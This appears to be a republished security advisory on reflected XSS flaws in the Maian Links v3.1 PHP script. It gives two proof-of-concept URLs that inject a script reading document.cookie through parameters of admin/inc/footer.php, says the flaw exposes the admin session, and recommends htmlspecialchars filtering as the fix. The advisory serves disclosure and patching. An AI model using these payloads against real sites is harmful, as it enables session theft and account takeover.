Maian Links v3.1 XSS vulnerabilities discovered by IRCRASH team. Download script from maianscriptworld.co.uk. Exploits in admin/inc/footer.php allow getting admin session. Solution: use htmlspecialchar() to filter variables. Contact: [email protected]
`----------------------------------------------------------------
Script : Maian Links v3.1
Type : XSS Vulnerabilities
----------------------------------------------------------------
Discovered by : Khashayar Fereidani Or Dr.Crash
Our Team : IRCRASH
----------------------------------------------------------------
Our Site : Http://IRCRASH.COM
IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM
----------------------------------------------------------------
IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr
----------------------------------------------------------------
Script Download : http://www.maianscriptworld.co.uk/free-php-scripts.html
----------------------------------------------------------------
XSS 1 : http://Example/admin/inc/footer.php?msg_script3= " <script>alert(document.cookie)</script>
XSS 2 : http://Example/admin/inc/footer.php?msg_script2=<script>alert(document.cookie)</script>
You Can Get Admin Session With This Vuln ....
----------------------------------------------------------------
Solution : Edit Source Code And Filter Variable With htmlspecialchar() function .......
----------------------------------------------------------------
TNx : God......
Khashayar Fereidani Email : irancrash[at]gmail[dot]com
----------------------------------------------------------------
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo